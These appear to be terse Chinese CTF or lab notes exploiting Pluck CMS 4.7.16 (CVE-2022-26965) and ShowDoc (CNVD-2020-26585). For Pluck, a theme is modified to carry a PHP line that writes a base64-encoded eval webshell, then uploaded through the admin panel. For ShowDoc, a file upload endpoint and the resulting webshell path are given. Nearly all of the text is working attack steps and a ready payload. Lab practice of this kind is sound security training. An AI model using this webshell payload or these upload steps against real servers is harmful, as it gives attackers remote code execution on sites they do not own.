(CVE-2022-26965)(CNVD-2020-26585)
Pluck-CMS-Pluck-4.7.16 后台RCE(CVE-2022-26965)

登录后台:# 账号:admin 密码:admin


更换语言:url:http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=language

安装主题:url:http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=theme

下载主题:https://github.com/billcreswell/redline-theme

修改info.php文件:<?php file_put_contents(‘shell.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWyJjbWQiXSkgPz4=’)); ?>


在压缩回zip文件


文件上传:url:http://eci-2ze2rdxwpdoyrygfp4lq.cloudeci1.ichunqiu.com/admin.php?action=themeinstall

查看flag值:url:http://eci-2ze9dusydlu2bfxeqf0k.cloudeci1.ichunqiu.com/shell.php


showdoc 文件上传(CNVD-2020-26585)
漏洞介绍:ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。 api_page存在任意文件上传。


url:http://192.168.85.131:35988/index.php?s=/home/page/uploadImg


访问一句话:http://192.168.85.131:35988/Public/Uploads/2024-05-13/6641704e967e6.php



